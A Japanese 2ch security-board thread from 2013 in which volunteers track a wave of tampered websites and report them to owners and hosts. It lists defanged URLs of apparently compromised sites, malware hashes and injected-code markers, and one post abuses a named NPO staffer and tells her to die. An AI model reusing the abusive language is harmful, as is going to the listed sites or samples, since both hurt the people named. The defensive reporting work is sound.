https://www.virustotal.com/en/file/64b9d4cf390e37a1017b8a585917c0d21c476cdd59193cc3b28fe46861ffd921/analysis/1262711933/
SHA256: 64b9d4cf390e37a1017b8a585917c0d21c476cdd59193cc3b28fe46861ffd921
File size: 4.5 KB ( 4651 bytes )
File name: JavaGame.jar
File type: JAR
Detection ratio: 8 / 41
Analysis date: 2010-01-05 15:35:32 UTC
2年半経って誰かが投げてた
https://www.virustotal.com/en/file/64b9d4cf390e37a1017b8a585917c0d21c476cdd59193cc3b28fe46861ffd921/analysis/1340451906/
File size: 4.5 KB ( 4651 bytes )
File name: jar_cache8170738606501754937.tmp
Detection ratio: 31 / 42
Analysis date: 2012-06-23 11:45:06 UTC
同じ日に漏れがVTに投げた8080
https://www.virustotal.com/en/file/a58e3a42daf56fa95d67a157b9c699e43e89e254bcc717ff04d9d19d1ffb40b4/analysis/1262711712/
SHA256: a58e3a42daf56fa95d67a157b9c699e43e89e254bcc717ff04d9d19d1ffb40b4
File size: 63 bytes ( 63 bytes )
File name: win.jpg
File type: unknown
Tags: exploit
cve-2008-0015
Detection ratio: 20 / 41
Analysis date: 2010-01-05 15:38:31 UTC
3年経って誰かが投げたの
https://www.virustotal.com/en/file/a58e3a42daf56fa95d67a157b9c699e43e89e254bcc717ff04d9d19d1ffb40b4/analysis/1363173304/
File name: win[1]
Detection ratio: 16 / 45
Analysis date: 2013-03-13 11:15:04 UTC
定期的に誰かが過去のブツを診てるんだろか
しかも検出率が下がってるのがあるってのは……
https://www.virustotal.com/en/file/64b9d4cf390e37a1017b8a585917c0d21c476cdd59193cc3b28fe46861ffd921/analysis/1262711933/
SHA256: 64b9d4cf390e37a1017b8a585917c0d21c476cdd59193cc3b28fe46861ffd921
File size: 4.5 KB ( 4651 bytes )
File name: JavaGame.jar
File type: JAR
Detection ratio: 8 / 41
Analysis date: 2010-01-05 15:35:32 UTC
2年半経って誰かが投げてた
https://www.virustotal.com/en/file/64b9d4cf390e37a1017b8a585917c0d21c476cdd59193cc3b28fe46861ffd921/analysis/1340451906/
File size: 4.5 KB ( 4651 bytes )
File name: jar_cache8170738606501754937.tmp
Detection ratio: 31 / 42
Analysis date: 2012-06-23 11:45:06 UTC
同じ日に漏れがVTに投げた8080
https://www.virustotal.com/en/file/a58e3a42daf56fa95d67a157b9c699e43e89e254bcc717ff04d9d19d1ffb40b4/analysis/1262711712/
SHA256: a58e3a42daf56fa95d67a157b9c699e43e89e254bcc717ff04d9d19d1ffb40b4
File size: 63 bytes ( 63 bytes )
File name: win.jpg
File type: unknown
Tags: exploit
cve-2008-0015
Detection ratio: 20 / 41
Analysis date: 2010-01-05 15:38:31 UTC
3年経って誰かが投げたの
https://www.virustotal.com/en/file/a58e3a42daf56fa95d67a157b9c699e43e89e254bcc717ff04d9d19d1ffb40b4/analysis/1363173304/
File name: win[1]
Detection ratio: 16 / 45
Analysis date: 2013-03-13 11:15:04 UTC
定期的に誰かが過去のブツを診てるんだろか
しかも検出率が下がってるのがあるってのは……
146 :/名無しさん[1-30] ◆.htmlint.U :2013/06/15(土) 07:07:05.32
147 :名無しさん@お腹いっぱい。:2013/06/15(土) 09:23:15.89
www●miwax●co●jp/
nishikutu●co●jp/
chiyoda-nagoya●co●jp/
kaigokeieigakkai●jp/
www●hanabusa-office●jp/
casinotaro●com/
coscos●info/
orpheus●6●ql●bz/top●html
defi-pro●com/
himesou●jp/
www●eekuchikomi●com/
www●deaipeace●com/
nishikutu●co●jp/
chiyoda-nagoya●co●jp/
kaigokeieigakkai●jp/
www●hanabusa-office●jp/
casinotaro●com/
coscos●info/
orpheus●6●ql●bz/top●html
defi-pro●com/
himesou●jp/
www●eekuchikomi●com/
www●deaipeace●com/
148 :名無しさん@お腹いっぱい。:2013/06/15(土) 13:03:07.84
queenuruga●weblog●tc/
77x●info/
bukyu●net/
etaiken●info/
www●etaiken●info/
safetyzone●jp/
curesmile●net/
77x●info/
bukyu●net/
etaiken●info/
www●etaiken●info/
safetyzone●jp/
curesmile●net/
149 :名無しさん@お腹いっぱい。:2013/06/15(土) 19:45:29.02
150 :/名無しさん[1-30] ◆.htmlint.U :2013/06/16(日) 03:04:19.30
お疲れ様です。
こちらからも受け取ってくれるかは不明ですが一通にてつーほーしました。
時間が掛かったので、既に対応してるっぽいのがあるん。。。orz......
>>149
> 404
www草付けるとピコーン
リダイレクトされてるお
こちらからも受け取ってくれるかは不明ですが一通にてつーほーしました。
時間が掛かったので、既に対応してるっぽいのがあるん。。。orz......
>>149
> 404
www草付けるとピコーン
リダイレクトされてるお
151 :名無しさん@お腹いっぱい。:2013/06/16(日) 19:29:24.79
www●chiyoda-nagoya●co●jp/
curesmile●net/
shmj●jp/
curesmile●net/
shmj●jp/
152 :/名無しさん[1-30] ◆.htmlint.U :2013/06/17(月) 03:16:39.52
ハゲスクネモイ
お疲れ様です。
>>151
上二つは>>150で一つに纏めてホスティングにめる送付済み
最後のはIPアドレスもあばばばばば
誘導先もあばばばばば
これもIPアドレスあばばばばば
それぞれ分けて二通めるしました。
お疲れ様です。
>>151
上二つは>>150で一つに纏めてホスティングにめる送付済み
最後のはIPアドレスもあばばばばば
誘導先もあばばばばば
これもIPアドレスあばばばばば
それぞれ分けて二通めるしました。
153 :/名無しさん[1-30] ◆.htmlint.U :2013/06/19(水) 18:08:21.47
Analysis Center (jpcert_ac) on Twitter
https://twitter.com/jpcert_ac/status/343936667083751424
> ここ最近の Web サイト改ざんですが、そのシグネチャである 6桁の 16進数からコードネーム: COLOR として我々は調査・分析を進めています。
https://twitter.com/jpcert_ac/status/345343485387345920
> Color 改ざんですが、現在確認できているパターンは画像のとおりです。他にも情報があれば是非ともご報告ください。
https://twitter.com/jpcert_ac/status/343936667083751424
> ここ最近の Web サイト改ざんですが、そのシグネチャである 6桁の 16進数からコードネーム: COLOR として我々は調査・分析を進めています。
https://twitter.com/jpcert_ac/status/345343485387345920
> Color 改ざんですが、現在確認できているパターンは画像のとおりです。他にも情報があれば是非ともご報告ください。
154 :名無しさん@お腹いっぱい。:2013/06/21(金) 17:05:59.81
相次ぐWebサイト改ざん被害 遅れる対応-ばびぶべぼBlog
blog.babibubebo.org/archives/648
blog.babibubebo.org/archives/648
155 :名無しさん@お腹いっぱい。:2013/06/21(金) 22:11:14.21
vol1●co●jp/
favorite-place●co●jp/
aa287●net/
27●50●104●30/
bluepower●jp/
favorite-place●co●jp/
aa287●net/
27●50●104●30/
bluepower●jp/
156 :名無しさん@お腹いっぱい。:2013/06/21(金) 22:35:23.34
www●ocn●ne●jp/~usp
yc-oiso●co●jp/
www●vertex-co●jp/
vertex-co●jp/
sub-lease●co●jp/
yc-oiso●co●jp/
www●vertex-co●jp/
vertex-co●jp/
sub-lease●co●jp/
157 :名無しさん@お腹いっぱい。:2013/06/21(金) 22:53:40.82
越谷市議会議員 大石みえこ
www●me-oec●jp/
www●me-oec●jp/
158 :/名無しさん[1-30] ◆.htmlint.U :2013/06/22(土) 03:20:42.05
一箇所診るのに3時間……
おつかれさまです
っと、ゆーわけで155の一番目だけめるしました。
(゚ν゚) 説明ムズカスィネー
おつかれさまです
っと、ゆーわけで155の一番目だけめるしました。
(゚ν゚) 説明ムズカスィネー
159 :名無しさん@お腹いっぱい。:2013/06/22(土) 11:38:51.48
www1●ocn●ne●jp/~hiroin/
www1●ocn●ne●jp/~ruri-5k/
www3●ocn●ne●jp/~kyouei/
www3●ocn●ne●jp/~ootsuka3/
www3●ocn●ne●jp/~yuuaikai/
www5●ocn●ne●jp/~itosj/
www5●ocn●ne●jp/~pogo/index5●html
www6●ocn●ne●jp/~no-seki/espanol/este_instituto●htm
www6●ocn●ne●jp/~snwest/
www6●ocn●ne●jp/~yoko-yh/
www1●ocn●ne●jp/~ruri-5k/
www3●ocn●ne●jp/~kyouei/
www3●ocn●ne●jp/~ootsuka3/
www3●ocn●ne●jp/~yuuaikai/
www5●ocn●ne●jp/~itosj/
www5●ocn●ne●jp/~pogo/index5●html
www6●ocn●ne●jp/~no-seki/espanol/este_instituto●htm
www6●ocn●ne●jp/~snwest/
www6●ocn●ne●jp/~yoko-yh/
160 :名無しさん@お腹いっぱい。:2013/06/22(土) 11:41:15.19
www7●ocn●ne●jp/~jasmine1/
www8●ocn●ne●jp/~ntlkk/
www10●ocn●ne●jp/~usp/
www11●ocn●ne●jp/~noburu/
www12●ocn●ne●jp/~hokuyou/
www13●ocn●ne●jp/~tpark/
www15●ocn●ne●jp/~super/4rinbkpad/click-htm/honda-click●htm
www16●ocn●ne●jp/~m●hiroba/
www16●ocn●ne●jp/~permayav/
www16●ocn●ne●jp/~voyager3/
www18●ocn●ne●jp/~yrfc/
www2●ocn●ne●jp/~oimo/
www8●ocn●ne●jp/~ntlkk/
www10●ocn●ne●jp/~usp/
www11●ocn●ne●jp/~noburu/
www12●ocn●ne●jp/~hokuyou/
www13●ocn●ne●jp/~tpark/
www15●ocn●ne●jp/~super/4rinbkpad/click-htm/honda-click●htm
www16●ocn●ne●jp/~m●hiroba/
www16●ocn●ne●jp/~permayav/
www16●ocn●ne●jp/~voyager3/
www18●ocn●ne●jp/~yrfc/
www2●ocn●ne●jp/~oimo/
161 :名無しさん@お腹いっぱい。:2013/06/22(土) 12:37:49.44
福島県商工会連合会
www●do-fukushima●or●jp/fukuseiren/
商工会ってどこも感染しまくっている
www●do-fukushima●or●jp/fukuseiren/
商工会ってどこも感染しまくっている
162 :名無しさん@お腹いっぱい。:2013/06/22(土) 12:56:41.06
>>155
@ABCD
NTTコミュニケーションズのブツは>>143のOCNのフォームでおkなので発射完了
担当部署(セキュリティ)への電話は月曜以降
>>156
@ 404
ABC
NTTコミュニケーションズのブツは>>143のOCNのフォームでおkなので発射完了
担当部署(セキュリティ)への電話は月曜以降
D私に分からないのでパス
>>157
議員本人に連絡、完了
>>159-161
後程
@ABCD
NTTコミュニケーションズのブツは>>143のOCNのフォームでおkなので発射完了
担当部署(セキュリティ)への電話は月曜以降
>>156
@ 404
ABC
NTTコミュニケーションズのブツは>>143のOCNのフォームでおkなので発射完了
担当部署(セキュリティ)への電話は月曜以降
D私に分からないのでパス
>>157
議員本人に連絡、完了
>>159-161
後程
163 :名無しさん@お腹いっぱい。:2013/06/22(土) 13:54:12.02
164 :名無しさん@お腹いっぱい。:2013/06/22(土) 17:44:17.63
kobeiccgolf●or●jp/kita_kobe/gdo/
c-house●or●jp/
akashikaisei-hp●or●jp/recruit_contact
kumamoto-norimen●or●jp/
www●la-la-la●or●jp/
c-house●or●jp/
akashikaisei-hp●or●jp/recruit_contact
kumamoto-norimen●or●jp/
www●la-la-la●or●jp/
165 :名無しさん@お腹いっぱい。:2013/06/22(土) 18:50:59.45
166 :名無しさん@お腹いっぱい。:2013/06/23(日) 10:17:45.63
esn●co●jp
futurebud●co●jp
h-seiken●co●jp
haruyamakensetsu●co●jp/include/url●js
kizaitecto●co●jp
kk-nishimaki●co●jp/js/window●js
kk-nishimaki●co●jp/js/navi●js
mikic●co●jp
morisaki-kk●co●jp
muratasekkei●co●jp
futurebud●co●jp
h-seiken●co●jp
haruyamakensetsu●co●jp/include/url●js
kizaitecto●co●jp
kk-nishimaki●co●jp/js/window●js
kk-nishimaki●co●jp/js/navi●js
mikic●co●jp
morisaki-kk●co●jp
muratasekkei●co●jp
167 :名無しさん@お腹いっぱい。:2013/06/23(日) 10:46:18.92
advance-sakura●co●jp
eishin-maoyi●co●jp
favorite-place●co●jp
grow-ltd●co●jp
h-refresh●co●jp
innk●co●jp
k02●co●jp
kaigai-inc●co●jp/resource/secure/ 改ざん
kasuga-mfg●co●jp
okamoto-denki●co●jp
eishin-maoyi●co●jp
favorite-place●co●jp
grow-ltd●co●jp
h-refresh●co●jp
innk●co●jp
k02●co●jp
kaigai-inc●co●jp/resource/secure/ 改ざん
kasuga-mfg●co●jp
okamoto-denki●co●jp
168 :コテハン ◆8080adndqg :2013/06/23(日) 12:14:11.95
www●znet●ne●jp/msd/
www●createur-net●com/
www●araiyasan●jp/
www●tuziwa●jp/
ichigu●memopad●org/
8080並みやね…これ
www●createur-net●com/
www●araiyasan●jp/
www●tuziwa●jp/
ichigu●memopad●org/
8080並みやね…これ
169 :名無しさん@お腹いっぱい。:2013/06/23(日) 12:22:23.24
>>166
@ACDGH OCNフォーム発射完了
EF0c0896確認 OCNフォーム発射完了
B私には分からないのでパス
>>167
@ABCDEFHI
OCNフォーム発射完了
G私には分からないのでOCNへ、改ざん有無の精査を依頼
@ACDGH OCNフォーム発射完了
EF0c0896確認 OCNフォーム発射完了
B私には分からないのでパス
>>167
@ABCDEFHI
OCNフォーム発射完了
G私には分からないのでOCNへ、改ざん有無の精査を依頼
170 :コテハン ◆8080adndqg :2013/06/23(日) 12:29:00.49
>>168
www●znet●ne●jp/msd/
鯖丸ごとやられてる感じw
↓
www.google.co.jp/search?hl=ja&source=hp&q=site%3Awww.znet.ne.jp%2Fmsd%2F&btnG=Google+%E6%A4%9C%E7%B4%A2&gbv=1
www●znet●ne●jp/msd/
鯖丸ごとやられてる感じw
↓
www.google.co.jp/search?hl=ja&source=hp&q=site%3Awww.znet.ne.jp%2Fmsd%2F&btnG=Google+%E6%A4%9C%E7%B4%A2&gbv=1
171 :名無しさん@お腹いっぱい。:2013/06/23(日) 12:50:17.93
>>169
>>167 Gのやつ
jsunpack
411eac06a7475cdd11450051ca075fdc17594caf
virustotal
www.virustotal.com/ja/url/7362a2240ccdabcebe7ad4cb0e90512da40669fbe56bb8b881564610d49f2f4e/analysis/1371959125/
www.virustotal.com/ja/file/9da5a899b9d55e1d43718ec0ad6368f9e9ef0242a4e88cd5ddb2cc6d7bfa5fb3/analysis/1371830823/
>>167 Gのやつ
jsunpack
411eac06a7475cdd11450051ca075fdc17594caf
virustotal
www.virustotal.com/ja/url/7362a2240ccdabcebe7ad4cb0e90512da40669fbe56bb8b881564610d49f2f4e/analysis/1371959125/
www.virustotal.com/ja/file/9da5a899b9d55e1d43718ec0ad6368f9e9ef0242a4e88cd5ddb2cc6d7bfa5fb3/analysis/1371830823/
172 :名無しさん@お腹いっぱい。:2013/06/23(日) 15:46:44.85
znetはコンピュータソフト開発のパティオシステムズですね。
どうりで最近三重県ばかりが何故多いのかと思ってた。
どうりで最近三重県ばかりが何故多いのかと思ってた。
173 :/名無しさん[1-30] ◆.htmlint.U :2013/06/23(日) 16:05:53.47
お疲れ様です。
166の三番目みます
166の三番目みます
174 :名無しさん@お腹いっぱい。:2013/06/23(日) 18:05:02.83
病理ウイルスも、パンデミックを通り越して常態化した場合は個人の体力や免疫に頼るしかないように
コンピュータウイルスも、脆弱性の無い最新の環境(新しいPC、最新のOS)を整えるしかないのでしょう
w7が出る前のガンブラー騒動、w8.1が出る直前の今回
タイミング的にもやはり、マイクロソフトの販促キャンペーンでしょうかw
166のBはおそらく
<!--0c0896--> から
<!--/0c0896--> まで
www.virustotal.com/ja/file/e4422ac4ca9fafa8110127ddfff298f9f78065f336dafaacaf8ce9db294a03f1/analysis/1371976952/
窓口が休みなので月曜以降にフローを確認してから
コンピュータウイルスも、脆弱性の無い最新の環境(新しいPC、最新のOS)を整えるしかないのでしょう
w7が出る前のガンブラー騒動、w8.1が出る直前の今回
タイミング的にもやはり、マイクロソフトの販促キャンペーンでしょうかw
166のBはおそらく
<!--0c0896--> から
<!--/0c0896--> まで
www.virustotal.com/ja/file/e4422ac4ca9fafa8110127ddfff298f9f78065f336dafaacaf8ce9db294a03f1/analysis/1371976952/
窓口が休みなので月曜以降にフローを確認してから
175 :/名無しさん[1-30] ◆.htmlint.U :2013/06/23(日) 18:41:03.37
176 :/名無しさん[1-30] ◆.htmlint.U :2013/06/23(日) 18:55:19.07
167の八番目みます
applet archive="otxUB.jar"
applet archive="otxUB.jar"
177 :/名無しさん[1-30] ◆.htmlint.U :2013/06/23(日) 19:31:22.94
178 :/名無しさん[1-30] ◆.htmlint.U :2013/06/23(日) 20:02:02.99
めも
http://wepawet.iseclab.org/view.php?hash=0eae6985b6ab7467ae764e066a3f3d45&t=1369380290&type=js
Hash
52390e6a6c74db94eb86c72034328989
https://www.virustotal.com/en/file/fc5cdd4cbc7ba76979088d4afadbf97456069206545a37fc390aa6210a2fb501/analysis/1369643146/
SHA256: fc5cdd4cbc7ba76979088d4afadbf97456069206545a37fc390aa6210a2fb501
SHA1: 9c702e0865b1be8fbfa743bcb7fea45bcc09bf87
MD5: 52390e6a6c74db94eb86c72034328989
File size: 336.9 KB ( 345005 bytes )
現時点404
http://wepawet.iseclab.org/view.php?hash=0eae6985b6ab7467ae764e066a3f3d45&t=1369380290&type=js
Hash
52390e6a6c74db94eb86c72034328989
https://www.virustotal.com/en/file/fc5cdd4cbc7ba76979088d4afadbf97456069206545a37fc390aa6210a2fb501/analysis/1369643146/
SHA256: fc5cdd4cbc7ba76979088d4afadbf97456069206545a37fc390aa6210a2fb501
SHA1: 9c702e0865b1be8fbfa743bcb7fea45bcc09bf87
MD5: 52390e6a6c74db94eb86c72034328989
File size: 336.9 KB ( 345005 bytes )
現時点404
179 :/名無しさん[1-30] ◆.htmlint.U :2013/06/23(日) 20:22:44.68
( ゚∀゚)アハハ八八ノヽノヽノヽノ \ / \/ \
SPAM扱いされて、いくつかベンダーに届かないでやんよ>>177
SPAM扱いされて、いくつかベンダーに届かないでやんよ>>177
180 :コテハン ◆8080adndqg :2013/06/24(月) 14:33:41.86
>>170
www.google.com/safebrowsing/diagnostic?site=www.znet.ne.jp/msd/&hl=ja
検索結果を見ると…
>このサイトはコンピュータに損害を与える可能性があります。
>このサイトはコンピュータに損害を与える可能性があります。
>このサイトはコンピュータに損害を与える可能性があります。
>このサイトはコンピュータに損害を与える可能性があります。
>このサイトはコンピュータに損害を与える可能性があります。
>このサイトはコンピュータに損害を与える可能性があります。
>このサイトはコンピュータに損害を与える可能性があります。
\(^o^)/ハジマタwww
www.google.com/safebrowsing/diagnostic?site=www.znet.ne.jp/msd/&hl=ja
検索結果を見ると…
>このサイトはコンピュータに損害を与える可能性があります。
>このサイトはコンピュータに損害を与える可能性があります。
>このサイトはコンピュータに損害を与える可能性があります。
>このサイトはコンピュータに損害を与える可能性があります。
>このサイトはコンピュータに損害を与える可能性があります。
>このサイトはコンピュータに損害を与える可能性があります。
>このサイトはコンピュータに損害を与える可能性があります。
\(^o^)/ハジマタwww
181 :名無しさん@お腹いっぱい。:2013/06/24(月) 16:05:22.36
http://kohada.2ch.net/test/read.cgi/sec/1295261877/329 誤爆orz
>>166
B 完了
ドメイン管理=ステージグループ(ホームページ制作)ここの対応も優
>>168
@ 一応完了※但し、馬鹿過ぎて話にならず
A完了
クレアトゥール 福井 ← そもそも電話に出ないので上流へ電話
→ GMOインターネット株式会社
B一応完了
残念な人達の様なので無理ぽ
C 一応完了
残念な人達の様なので無理ぽ
D 完了
NPO法人 一隅を照らす会の馬鹿女に伝えておきました
ドブス馬鹿女へ、 関係ないなら何故閉鎖するのか、死ね!
>>166
B 完了
ドメイン管理=ステージグループ(ホームページ制作)ここの対応も優
>>168
@ 一応完了※但し、馬鹿過ぎて話にならず
A完了
クレアトゥール 福井 ← そもそも電話に出ないので上流へ電話
→ GMOインターネット株式会社
B一応完了
残念な人達の様なので無理ぽ
C 一応完了
残念な人達の様なので無理ぽ
D 完了
NPO法人 一隅を照らす会の馬鹿女に伝えておきました
ドブス馬鹿女へ、 関係ないなら何故閉鎖するのか、死ね!
182 :名無しさん@お腹いっぱい。:2013/06/24(月) 16:42:17.94
183 :/名無しさん[1-30] ◆.htmlint.U :2013/06/24(月) 19:55:16.33
オツカレサマデス
こちらの環境では>168の五番目がぁぅぁぅのままだったので鯖管にめるしました。
フォームでは漏れのめあど蹴られちゃう
こちらの環境では>168の五番目がぁぅぁぅのままだったので鯖管にめるしました。
フォームでは漏れのめあど蹴られちゃう
184 :名無しさん@お腹いっぱい。:2013/06/24(月) 20:54:54.40
185 :/名無しさん[1-30] ◆.htmlint.U :2013/06/24(月) 22:22:08.12
saitoadobaizanikisaishimasuta
186 :コテハン ◆8080adndqg :2013/06/25(火) 00:49:11.01
>>181-185
乙カレー
www●fukushima-l●com/forrent/
www●nifa●co●jp/
www●guitaristlip●com/
www●moonshot●co●jp/
www●montessori-japan●com/
消えてもらったほうがいいようなサイト
rockbook01●awe●jp/dekome/
乙カレー
www●fukushima-l●com/forrent/
www●nifa●co●jp/
www●guitaristlip●com/
www●moonshot●co●jp/
www●montessori-japan●com/
消えてもらったほうがいいようなサイト
rockbook01●awe●jp/dekome/
187 :/名無しさん[1-30] ◆.htmlint.U :2013/06/25(火) 01:08:43.64
【忍者ホームページ】ホームページの改ざん被害にご注意下さい ※要確認※|お知らせ|忍者ツールズ
http://www.ninja.co.jp/information/all_category/info/8449/
間に合うかな? 時間がキビシーのもあって
>>186の一番目だけみます
とっぷからぁうぁう
http://www.ninja.co.jp/information/all_category/info/8449/
間に合うかな? 時間がキビシーのもあって
>>186の一番目だけみます
とっぷからぁうぁう
188 :/名無しさん[1-30] ◆.htmlint.U :2013/06/25(火) 03:16:28.69
189 :名無しさん@お腹いっぱい。:2013/06/25(火) 18:07:52.36
>>186
@サイト所有会社に電話連絡完了(すでに把握していたもより)
Aパス(対応済みと思われ)
BOCNフォーム発射完了
Cサイト所有会社に電話連絡完了
Dサイト所有会社に電話連絡完了
Eデジロックは放置(そもそも無理ぽ)
※デジロック以外は全力で対応
いずれweb改ざんの元凶はデジロックであるとして
司直の手により殲滅
@サイト所有会社に電話連絡完了(すでに把握していたもより)
Aパス(対応済みと思われ)
BOCNフォーム発射完了
Cサイト所有会社に電話連絡完了
Dサイト所有会社に電話連絡完了
Eデジロックは放置(そもそも無理ぽ)
※デジロック以外は全力で対応
いずれweb改ざんの元凶はデジロックであるとして
司直の手により殲滅
190 :名無しさん@お腹いっぱい。:2013/06/25(火) 21:15:55.96
www12●ocn●ne●jp/~kabanos/
www7●ocn●ne●jp/~takara3/
www10●ocn●ne●jp/~clubpome/
www6●ocn●ne●jp/~ohisama1/
www5●ocn●ne●jp/~yukio●ok/
www13●ocn●ne●jp/~touki/
www17●ocn●ne●jp/~bonsai/
www2●ocn●ne●jp/~kikikm/
www7●ocn●ne●jp/~takara3/
www10●ocn●ne●jp/~clubpome/
www6●ocn●ne●jp/~ohisama1/
www5●ocn●ne●jp/~yukio●ok/
www13●ocn●ne●jp/~touki/
www17●ocn●ne●jp/~bonsai/
www2●ocn●ne●jp/~kikikm/
191 :名無しさん@お腹いっぱい。:2013/06/26(水) 02:38:52.58
>>190
OCNフォーム発射完了
OCNフォーム発射完了
192 :オルティス・ジャパン:2013/06/26(水) 17:24:25.51
バリュードメインvalue-domain.com(デジロック)正規フロー窓口を聞き出しました
www.value-domain.com/webabuse.php
↑の一番下にフォームがあります
>>186E
フォーム発射完了
対応されるかtest
www.value-domain.com/webabuse.php
↑の一番下にフォームがあります
>>186E
フォーム発射完了
対応されるかtest
193 :/名無しさん[1-30] ◆.htmlint.U :2013/06/28(金) 02:35:14.54
>>186の2番目
JSとかぁぅぁぅ
さいとあどばいざにきさいしますた
ntt.netはあぶせにめるだけでいいのかな?
>>183
鯖管から対応かんりょのお返事いただきました
上流になるのかな?>鯖管
JSとかぁぅぁぅ
さいとあどばいざにきさいしますた
ntt.netはあぶせにめるだけでいいのかな?
>>183
鯖管から対応かんりょのお返事いただきました
上流になるのかな?>鯖管
194 :名無しさん@お腹いっぱい。:2013/06/28(金) 17:30:48.73
>>193
>>>186の2番目
./common/js/thickbox.js ./common/js/jquery.fontScaler.js"他いっぱい確認しました
www.virustotal.com/ja/file/15652cb5a2c3ec3abecd5530c2615cd863f1fa633a8878a434b43c196082ed11/analysis/1372406516/
トップの0112722100にお知らせしましたが、HPを製作した委託先とは切れていて分かる人はいないそうです
jpサートとIPAの相談電番を案内してみました
>>>183
>鯖管から対応かんりょのお返事いただきました
乙です
>上流になるのかな?>鯖管
ジャマイカ
>>>186の2番目
./common/js/thickbox.js ./common/js/jquery.fontScaler.js"他いっぱい確認しました
www.virustotal.com/ja/file/15652cb5a2c3ec3abecd5530c2615cd863f1fa633a8878a434b43c196082ed11/analysis/1372406516/
トップの0112722100にお知らせしましたが、HPを製作した委託先とは切れていて分かる人はいないそうです
jpサートとIPAの相談電番を案内してみました
>>>183
>鯖管から対応かんりょのお返事いただきました
乙です
>上流になるのかな?>鯖管
ジャマイカ
195 :/名無しさん[1-30] ◆.htmlint.U :2013/06/28(金) 21:35:29.46
196 :名無しさん@お腹いっぱい。:2013/06/28(金) 21:48:00.85
21:00からですん
以前の委託先に緊急連絡したんでしょ
そんなんかな
ついでに言わしちくり
やられたでござる←むかつくねん
以前の委託先に緊急連絡したんでしょ
そんなんかな
ついでに言わしちくり
やられたでござる←むかつくねん
197 :/名無しさん[1-30] ◆.htmlint.U :2013/06/28(金) 22:48:35.98
りねーむすてるん。なんか公開修正みたいな木が汁
ご愁傷様 > やられたでござる
ご愁傷様 > やられたでござる
198 :名無しさん@お腹いっぱい。:2013/06/28(金) 23:11:17.35
話題のwww●nifa●co●jp/
2013XXXXCopy_of_info.php
2013XXXXCopy_of_index.php
コードそのまま引きずってるとか・・
なんだよこれww
もしかして露出狂?
2013XXXXCopy_of_info.php
2013XXXXCopy_of_index.php
コードそのまま引きずってるとか・・
なんだよこれww
もしかして露出狂?
199 :/名無しさん[1-30] ◆.htmlint.U :2013/06/29(土) 02:50:14.38
別件
> Google セーフ ブラウジング
>
> 内容を送信しました
>
> Google にご報告いただきありがとうございます。これで報告は完了です。よろしければこちらもご覧ください。
>
> 1. ウェブ環境の安全性向上に貢献したご自分の功績を、しばしの間称えてあげましょう。
>
> 2. ウェブブラウザが最新バージョンであり、使用しているオペレーティング システムに最新のパッチが適用されていることを確認しましょう。
>
> 3. Stopbadware.org にアクセスしてパソコンに感染する可能性のあるマルウェアの詳細について確認しましょう。
超ネムイのでこくまで……
つかぐぐるにBlockされっぱなし。。。orz...........
> Google セーフ ブラウジング
>
> 内容を送信しました
>
> Google にご報告いただきありがとうございます。これで報告は完了です。よろしければこちらもご覧ください。
>
> 1. ウェブ環境の安全性向上に貢献したご自分の功績を、しばしの間称えてあげましょう。
>
> 2. ウェブブラウザが最新バージョンであり、使用しているオペレーティング システムに最新のパッチが適用されていることを確認しましょう。
>
> 3. Stopbadware.org にアクセスしてパソコンに感染する可能性のあるマルウェアの詳細について確認しましょう。
超ネムイのでこくまで……
つかぐぐるにBlockされっぱなし。。。orz...........
200 :名無しさん@お腹いっぱい。:2013/06/29(土) 08:23:05.72
www4●ocn●ne●jp/~sawa/get-novel●htm
www4●ocn●ne●jp/~kiyotomo
chiyoichi●com/
www●h-seiken●co●jp
art-tokugawa●com
vol1●co●jp
auseiki●com/
www●okamoto-denki●co●jp/
www4●ocn●ne●jp/~kiyotomo
chiyoichi●com/
www●h-seiken●co●jp
art-tokugawa●com
vol1●co●jp
auseiki●com/
www●okamoto-denki●co●jp/
201 :名無しさん@お腹いっぱい。:2013/06/29(土) 10:52:17.04
202 :名無しさん@お腹いっぱい。:2013/07/03(水) NY:AN:NY.AN
>>194さま
6/28 WEB改ざんに関して丁重にご指導して頂きまして、ありがとうございました。
おかげさまで、ホームページを復旧させることができましたことをこの場をお借りしてご報告させて頂きます。
また、教えて頂いた対策を一通り行いました。
今後は、発見される脆弱部のアップデートと、改ざんされた際の早急な対応を心がけていきたいと思います。
ご教授して頂いたことに深く感謝申し上げます。
6/28 WEB改ざんに関して丁重にご指導して頂きまして、ありがとうございました。
おかげさまで、ホームページを復旧させることができましたことをこの場をお借りしてご報告させて頂きます。
また、教えて頂いた対策を一通り行いました。
今後は、発見される脆弱部のアップデートと、改ざんされた際の早急な対応を心がけていきたいと思います。
ご教授して頂いたことに深く感謝申し上げます。
203 :名無しさん@お腹いっぱい。:2013/07/03(水) NY:AN:NY.AN
>>110,120,146,153
追加
ウェブサイト改ざんの増加に関する一般利用者(ウェブ閲覧者)向け注意喚起
www.ipa.go.jp/security/topics/alert20130626.html
相次ぐWeb改ざん、原因はまたもや“Gumblar”か
itpro.nikkeibp.co.jp/article/NEWS/20130702/488823/
Web改ざん検知と脆弱性診断をセットにした「BIGLOBE Webホスティング セキュリティセット」
提供開始〜8月30日までのご契約で3カ月無料キャンペーンを実施〜
www.sankeibiz.jp/business/news/130701/prl1307011548082-n1.htm
>>202
セキュ板の集合知の為せる業です
わざわざ最果ての過疎地へ報告どもですー
追加
ウェブサイト改ざんの増加に関する一般利用者(ウェブ閲覧者)向け注意喚起
www.ipa.go.jp/security/topics/alert20130626.html
相次ぐWeb改ざん、原因はまたもや“Gumblar”か
itpro.nikkeibp.co.jp/article/NEWS/20130702/488823/
Web改ざん検知と脆弱性診断をセットにした「BIGLOBE Webホスティング セキュリティセット」
提供開始〜8月30日までのご契約で3カ月無料キャンペーンを実施〜
www.sankeibiz.jp/business/news/130701/prl1307011548082-n1.htm
>>202
セキュ板の集合知の為せる業です
わざわざ最果ての過疎地へ報告どもですー
204 :/名無しさん[1-30] ◆.htmlint.U :2013/07/03(水) NY:AN:NY.AN
同じ日に取材なのね
急増するWebサイト改ざん、原因は「ガンブラー」か :日本経済新聞
http://www.nikkei.com/article/DGXNASFK0203F_S3A700C1000000/
なんでもかんでも「ガンブラー」ってのには無理があるような>報道論調
まだところどころでぃれくとりぃぐゎ>>197
急増するWebサイト改ざん、原因は「ガンブラー」か :日本経済新聞
http://www.nikkei.com/article/DGXNASFK0203F_S3A700C1000000/
なんでもかんでも「ガンブラー」ってのには無理があるような>報道論調
まだところどころでぃれくとりぃぐゎ>>197
205 :名無しさん@お腹いっぱい。:2013/07/03(水) NY:AN:NY.AN
まあ既存の何かと似たものがあればそれに例えたほうがわかりやすいからね
